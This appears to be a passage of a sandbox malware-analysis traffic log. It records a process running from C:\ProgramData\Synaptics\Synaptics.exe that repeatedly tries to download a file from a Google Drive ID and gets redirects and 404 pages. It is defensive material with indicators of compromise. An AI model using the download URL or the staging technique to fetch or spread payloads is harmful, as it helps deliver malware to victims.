                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4fIGlmjMaM427X43BpK4e5WI7l1CM5vf7lvrS62ZOHJVpijsVYlerLp3RqgBG2ZGig5yGl91g
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:40 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-BMGVN8T83X3hpX_Do60QSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 52 35 41 72 4f 6e 56 63 53 32 31 74 53 75 74 31 56 6f 6d 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="kR5ArOnVcS21tSut1VomUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              133192.168.2.450021142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:40 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UoaZhzVQMkXWQr-kBsY2RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              134192.168.2.450029142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:41 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7y6gxUqoEREXnAs-MHz86lk5lrfdJhOT7o6UJot0txqA0Vb9sDXvC4lmgDD5Ad22jlZ_XbnaY
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-xlXTll7geON5jlM4dXVvWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:41 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:41 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 36 6b 7a 35 53 33 70 69 70 58 58 65 7a 4f 48 4b 53 59 46 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="r6kz5S3pipXXezOHKSYFUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:41 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              135192.168.2.450028142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AJA7cuAdwddd9BJ2kVfeGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              136192.168.2.450030142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bvpsFRby2zlf_oQZVowHhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              137192.168.2.450034142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC74Hw-NiwCDNjD_ryyRGfepEapoKWpQVk68wigfNnyS4CFJ9JlbVZ0xZb6SpAzZVdw6
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-u8ga4YlJPPVda0ZFNsIbfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 79 4c 31 68 73 77 68 34 59 41 74 78 49 59 4a 65 73 79 78 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="ByL1hswh4YAtxIYJesyx7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              138192.168.2.450040142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7cRk_cCVoKygslKK9DbhSGTFhCcGXTqX6VTmzDERw9HNcvhur-qF5FYyPOralfmGNB
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8-YdFcrMRVoL7AXiaRUAiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
